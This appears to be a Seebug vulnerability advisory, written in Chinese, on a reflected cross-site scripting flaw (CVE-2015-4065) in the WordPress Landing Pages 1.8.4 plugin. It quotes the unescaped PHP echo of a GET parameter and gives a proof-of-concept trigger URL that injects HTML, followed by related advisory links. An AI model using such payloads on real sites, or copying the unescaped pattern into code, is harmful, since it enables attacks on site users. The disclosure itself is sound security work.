Lucene search
Yql丶SSV:89497HistorySep 21, 2015 - 12:00 a.m.
WordPress Landing Pages 1.8.4 Cross Site Scripting ( CVE-2015-4065 )
2015-09-2100:00:00
yql丶
www.seebug.org
13
0.001 Low
EPSS
Percentile
42.3%
插件: https://downloads.wordpress.org/plugin/landing-pages.1.8.4.zip
漏洞文件位置在 shared/shortcodes/inbound-shortcodes.php Line ~ 761
<iframe src='<?php echo INBOUDNOW_SHARED_URLPATH . 'shortcodes/'; ?>preview.php?sc=&post=<?php echo $_GET['post']; ?>' width="285" scrollbar='true' frameborder="0" id="inbound-shortcodes-preview"></iframe>
从上述文件可以看到 GET 方式传过来的参数 post 直接输出到 html 中造成了XSS
触发 url 如下
http://localhost/wordpress/wp-admin/post-new.php?post_type=inbound-forms&post=%27%3E%3C%2Fiframe%3E%3Ch1%3Exss%40TEST%3C%2Fh1%3E
结果如图
<img alt=“Clipboard Image.png” src=“https://images.seebug.org/contribute/9a4ed6a6-2f1c-4323-81ea-23740e4a652b-Clipboard Image.png”></img>
Related
cve
cve
CVE-2015-4065
2015-05-27 18:59:06
nvd
nvd
CVE-2015-4065
2015-05-27 18:59:06
patchstack
patchstack
WordPress Landing Pages Plugin <= 1.8.4 - XSS
2015-05-26 00:00:00
cvelist
cvelist
CVE-2015-4065
2015-05-27 18:00:00
prion
prion
Cross site scripting
2015-05-27 18:59:00
packetstorm
packetstorm
WordPress Landing Pages 1.8.4 Cross Site Scripting / SQL Injection
2015-05-25 00:00:00
exploitpack
exploitpack
WordPress Plugin Landing Pages 1.8.4 - Multiple Vulnerabilities
2015-05-26 00:00:00
wpvulndb
wpvulndb
WordPress Landing Pages <= 1.8.4 - XSS & SQL Injection
2015-05-25 00:00:00
zdt
zdt
exploitdb
exploitdb
WordPress Plugin Landing Pages 1.8.4 - Multiple Vulnerabilities
2015-05-26 00:00:00